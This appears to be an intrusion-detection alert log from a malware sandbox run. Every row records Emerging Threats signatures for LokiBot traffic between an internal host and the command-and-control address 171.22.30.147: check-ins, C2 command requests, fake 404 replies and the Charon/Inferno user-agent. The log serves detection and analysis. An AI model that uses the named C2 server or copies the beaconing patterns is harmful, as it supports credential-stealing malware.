              192.168.2.3171.22.30.14749777802024318 01/05/23-08:52:34.550245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749777802024313 01/05/23-08:52:34.550245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499332025483 01/05/23-08:53:20.124148TCP2025483ET TROJAN LokiBot Fake 404 Response8049933171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750046802021641 01/05/23-08:53:53.748051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749774802021641 01/05/23-08:52:32.369884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749883802024313 01/05/23-08:53:05.037332TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497602025483 01/05/23-08:52:28.390880TCP2025483ET TROJAN LokiBot Fake 404 Response8049760171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749834802024313 01/05/23-08:52:50.512718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749830802825766 01/05/23-08:52:49.252221TCP2825766ETPRO TROJAN LokiBot Checkin M24983080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749866802025381 01/05/23-08:53:00.520534TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749883802024318 01/05/23-08:53:05.037332TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500762025483 01/05/23-08:54:01.869812TCP2025483ET TROJAN LokiBot Fake 404 Response8050076171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497272025483 01/05/23-08:52:19.059286TCP2025483ET TROJAN LokiBot Fake 404 Response8049727171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749912802024313 01/05/23-08:53:14.329479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750029802825766 01/05/23-08:53:49.112211TCP2825766ETPRO TROJAN LokiBot Checkin M25002980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749724802825766 01/05/23-08:52:18.098497TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749728802024313 01/05/23-08:52:19.268418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497052025483 01/05/23-08:52:09.452565TCP2025483ET TROJAN LokiBot Fake 404 Response8049705171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750056802024313 01/05/23-08:53:56.463023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749802802825766 01/05/23-08:52:41.641382TCP2825766ETPRO TROJAN LokiBot Checkin M24980280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499962025483 01/05/23-08:53:39.013838TCP2025483ET TROJAN LokiBot Fake 404 Response8049996171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750052802825766 01/05/23-08:53:55.369344TCP2825766ETPRO TROJAN LokiBot Checkin M25005280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749723802024313 01/05/23-08:52:17.811814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500542025483 01/05/23-08:53:55.973562TCP2025483ET TROJAN LokiBot Fake 404 Response8050054171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750051802024318 01/05/23-08:53:55.100340TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749807802825766 01/05/23-08:52:43.044779TCP2825766ETPRO TROJAN LokiBot Checkin M24980780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749746802021641 01/05/23-08:52:24.299560TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749959802021641 01/05/23-08:53:28.075379TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750051802024313 01/05/23-08:53:55.100340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749723802024318 01/05/23-08:52:17.811814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749815802021641 01/05/23-08:52:45.213789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749818802024318 01/05/23-08:52:46.013246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749855802024318 01/05/23-08:52:57.514506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497792025483 01/05/23-08:52:35.313919TCP2025483ET TROJAN LokiBot Fake 404 Response8049779171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749824802021641 01/05/23-08:52:47.639113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749855802024313 01/05/23-08:52:57.514506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749818802024313 01/05/23-08:52:46.013246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749751802024313 01/05/23-08:52:25.762510TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749843802021641 01/05/23-08:52:54.266621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749972802025381 01/05/23-08:53:32.566966TCP2025381ET TROJAN LokiBot Checkin4997280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749846802024318 01/05/23-08:52:55.097334TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497762025483 01/05/23-08:52:33.700899TCP2025483ET TROJAN LokiBot Fake 404 Response8049776171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749911802025381 01/05/23-08:53:14.014731TCP2025381ET TROJAN LokiBot Checkin4991180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749999802021641 01/05/23-08:53:39.715844TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749760802024313 01/05/23-08:52:28.304789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749902802025381 01/05/23-08:53:11.610501TCP2025381ET TROJAN LokiBot Checkin4990280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749760802024318 01/05/23-08:52:28.304789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749761802825766 01/05/23-08:52:28.591148TCP2825766ETPRO TROJAN LokiBot Checkin M24976180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749751802024318 01/05/23-08:52:25.762510TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497352025483 01/05/23-08:52:21.355667TCP2025483ET TROJAN LokiBot Fake 404 Response8049735171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749856802825766 01/05/23-08:52:57.793570TCP2825766ETPRO TROJAN LokiBot Checkin M24985680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750067802025381 01/05/23-08:53:59.373237TCP2025381ET TROJAN LokiBot Checkin5006780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749857802025381 01/05/23-08:52:58.054307TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749828802825766 01/05/23-08:52:48.735651TCP2825766ETPRO TROJAN LokiBot Checkin M24982880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500732025483 01/05/23-08:54:01.037839TCP2025483ET TROJAN LokiBot Fake 404 Response8050073171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750010802025381 01/05/23-08:53:42.643021TCP2025381ET TROJAN LokiBot Checkin5001080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749720802021641 01/05/23-08:52:16.949813TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750065802024313 01/05/23-08:53:58.843527TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750078802825766 01/05/23-08:54:02.320663TCP2825766ETPRO TROJAN LokiBot Checkin M25007880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749733802825766 01/05/23-08:52:20.679095TCP2825766ETPRO TROJAN LokiBot Checkin M24973380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749946802825766 01/05/23-08:53:23.547730TCP2825766ETPRO TROJAN LokiBot Checkin M24994680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750077802024318 01/05/23-08:54:02.067623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749933802021641 01/05/23-08:53:20.043516TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750077802024313 01/05/23-08:54:02.067623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749882802025381 01/05/23-08:53:04.789158TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750065802024318 01/05/23-08:53:58.843527TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750068802024318 01/05/23-08:53:59.646284TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749928802025381 01/05/23-08:53:18.678448TCP2025381ET TROJAN LokiBot Checkin4992880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749745802825766 01/05/23-08:52:24.023320TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749798802024313 01/05/23-08:52:40.547899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749758802021641 01/05/23-08:52:27.765970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750062802021641 01/05/23-08:53:58.073723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749789802024318 01/05/23-08:52:38.076275TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750012802825766 01/05/23-08:53:43.190304TCP2825766ETPRO TROJAN LokiBot Checkin M25001280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749798802024318 01/05/23-08:52:40.547899TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749789802024313 01/05/23-08:52:38.076275TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749970802021641 01/05/23-08:53:32.043326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750037802021641 01/05/23-08:53:51.314352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749900802024318 01/05/23-08:53:10.997847TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750034802021641 01/05/23-08:53:50.478539TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749854802025381 01/05/23-08:52:57.240558TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499362025483 01/05/23-08:53:20.912682TCP2025483ET TROJAN LokiBot Fake 404 Response8049936171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749786802021641 01/05/23-08:52:37.217550TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749973802024313 01/05/23-08:53:32.829653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749762802025381 01/05/23-08:52:28.868227TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499142025483 01/05/23-08:53:14.932365TCP2025483ET TROJAN LokiBot Fake 404 Response8049914171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749973802024318 01/05/23-08:53:32.829653TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749845802025381 01/05/23-08:52:54.838950TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749961802021641 01/05/23-08:53:29.597138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749974802825766 01/05/23-08:53:33.106432TCP2825766ETPRO TROJAN LokiBot Checkin M24997480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749799802825766 01/05/23-08:52:40.836883TCP2825766ETPRO TROJAN LokiBot Checkin M24979980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750076802025381 01/05/23-08:54:01.789357TCP2025381ET TROJAN LokiBot Checkin5007680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749764802825766 01/05/23-08:52:29.472789TCP2825766ETPRO TROJAN LokiBot Checkin M24976480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749891802825766 01/05/23-08:53:07.205477TCP2825766ETPRO TROJAN LokiBot Checkin M24989180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749771802025381 01/05/23-08:52:31.374001TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749900802024313 01/05/23-08:53:10.997847TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749929802024318 01/05/23-08:53:18.948979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750011802024318 01/05/23-08:53:42.925761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749869802021641 01/05/23-08:53:01.298022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749929802024313 01/05/23-08:53:18.948979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749846802024313 01/05/23-08:52:55.097334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749920802825766 01/05/23-08:53:16.511672TCP2825766ETPRO TROJAN LokiBot Checkin M24992080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749736802825766 01/05/23-08:52:21.543284TCP2825766ETPRO TROJAN LokiBot Checkin M24973680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749819802825766 01/05/23-08:52:46.293306TCP2825766ETPRO TROJAN LokiBot Checkin M24981980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749790802025381 01/05/23-08:52:38.345416TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750068802024313 01/05/23-08:53:59.646284TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749907802021641 01/05/23-08:53:12.956728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499492025483 01/05/23-08:53:24.440314TCP2025483ET TROJAN LokiBot Fake 404 Response8049949171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749702802024318 01/05/23-08:52:08.155254TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749763802024318 01/05/23-08:52:29.176849TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749815802024313 01/05/23-08:52:45.213789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500602025483 01/05/23-08:53:57.625551TCP2025483ET TROJAN LokiBot Fake 404 Response8050060171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749763802024313 01/05/23-08:52:29.176849TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498122025483 01/05/23-08:52:44.499614TCP2025483ET TROJAN LokiBot Fake 404 Response8049812171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749858802024318 01/05/23-08:52:58.341182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750013802025381 01/05/23-08:53:43.455950TCP2025381ET TROJAN LokiBot Checkin5001380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750038802825766 01/05/23-08:53:51.593310TCP2825766ETPRO TROJAN LokiBot Checkin M25003880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749840802021641 01/05/23-08:52:53.465268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749999802024318 01/05/23-08:53:39.715844TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749843802024318 01/05/23-08:52:54.266621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749843802024313 01/05/23-08:52:54.266621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749880802025381 01/05/23-08:53:04.232334TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749797802025381 01/05/23-08:52:40.255110TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498942025483 01/05/23-08:53:08.094953TCP2025483ET TROJAN LokiBot Fake 404 Response8049894171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749779802025381 01/05/23-08:52:35.235559TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749975802025381 01/05/23-08:53:33.363507TCP2025381ET TROJAN LokiBot Checkin4997580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749791802024313 01/05/23-08:52:38.617554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749886802024318 01/05/23-08:53:05.845633TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750079802025381 01/05/23-08:54:02.588823TCP2025381ET TROJAN LokiBot Checkin5007980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497632025483 01/05/23-08:52:29.259911TCP2025483ET TROJAN LokiBot Fake 404 Response8049763171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749791802024318 01/05/23-08:52:38.617554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749886802024313 01/05/23-08:53:05.845633TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749903802024313 01/05/23-08:53:11.877542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497132025483 01/05/23-08:52:12.903010TCP2025483ET TROJAN LokiBot Fake 404 Response8049713171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749725802024313 01/05/23-08:52:18.390674TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750060802021641 01/05/23-08:53:57.543966TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749720802024318 01/05/23-08:52:16.949813TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749721802825766 01/05/23-08:52:17.231128TCP2825766ETPRO TROJAN LokiBot Checkin M24972180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749702802024313 01/05/23-08:52:08.155254TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749815802024318 01/05/23-08:52:45.213789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499772025483 01/05/23-08:53:33.981197TCP2025483ET TROJAN LokiBot Fake 404 Response8049977171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749737802021641 01/05/23-08:52:21.818381TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749720802024313 01/05/23-08:52:16.949813TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749816802825766 01/05/23-08:52:45.483412TCP2825766ETPRO TROJAN LokiBot Checkin M24981680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498402025483 01/05/23-08:52:53.550362TCP2025483ET TROJAN LokiBot Fake 404 Response8049840171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749885802025381 01/05/23-08:53:05.575803TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750076802825766 01/05/23-08:54:01.789357TCP2825766ETPRO TROJAN LokiBot Checkin M25007680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750065802021641 01/05/23-08:53:58.843527TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499932025483 01/05/23-08:53:38.222516TCP2025483ET TROJAN LokiBot Fake 404 Response8049993171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749930802021641 01/05/23-08:53:19.220224TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500322025483 01/05/23-08:53:50.027342TCP2025483ET TROJAN LokiBot Fake 404 Response8050032171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750022802021641 01/05/23-08:53:46.665385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749795802021641 01/05/23-08:52:39.717554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749798802021641 01/05/23-08:52:40.547899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500102025483 01/05/23-08:53:42.733074TCP2025483ET TROJAN LokiBot Fake 404 Response8050010171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498622025483 01/05/23-08:52:59.516920TCP2025483ET TROJAN LokiBot Fake 404 Response8049862171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498072025483 01/05/23-08:52:43.124131TCP2025483ET TROJAN LokiBot Fake 404 Response8049807171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749977802025381 01/05/23-08:53:33.899852TCP2025381ET TROJAN LokiBot Checkin4997780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749725802024318 01/05/23-08:52:18.390674TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750037802024313 01/05/23-08:53:51.314352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749903802024318 01/05/23-08:53:11.877542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749881802024313 01/05/23-08:53:04.500331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749782802825766 01/05/23-08:52:36.098088TCP2825766ETPRO TROJAN LokiBot Checkin M24978280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749842802025381 01/05/23-08:52:54.011182TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750037802024318 01/05/23-08:53:51.314352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749973802021641 01/05/23-08:53:32.829653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749881802024318 01/05/23-08:53:04.500331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749882802825766 01/05/23-08:53:04.789158TCP2825766ETPRO TROJAN LokiBot Checkin M24988280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749998802025381 01/05/23-08:53:39.461942TCP2025381ET TROJAN LokiBot Checkin4999880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749814802025381 01/05/23-08:52:44.953030TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499112025483 01/05/23-08:53:14.096617TCP2025483ET TROJAN LokiBot Fake 404 Response8049911171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749831802025381 01/05/23-08:52:49.539016TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749960802825766 01/05/23-08:53:28.475539TCP2825766ETPRO TROJAN LokiBot Checkin M24996080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749984802021641 01/05/23-08:53:35.743967TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749701802025381 01/05/23-08:52:07.731855TCP2025381ET TROJAN LokiBot Checkin4970180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749999802024313 01/05/23-08:53:39.715844TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750064802025381 01/05/23-08:53:58.597698TCP2025381ET TROJAN LokiBot Checkin5006480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749859802825766 01/05/23-08:52:58.622571TCP2825766ETPRO TROJAN LokiBot Checkin M24985980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749935802021641 01/05/23-08:53:20.565175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749949802025381 01/05/23-08:53:24.361661TCP2025381ET TROJAN LokiBot Checkin4994980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749854802825766 01/05/23-08:52:57.240558TCP2825766ETPRO TROJAN LokiBot Checkin M24985480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750036802025381 01/05/23-08:53:51.046851TCP2025381ET TROJAN LokiBot Checkin5003680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498292025483 01/05/23-08:52:49.086295TCP2025483ET TROJAN LokiBot Fake 404 Response8049829171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749858802024313 01/05/23-08:52:58.341182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3171.22.30.147
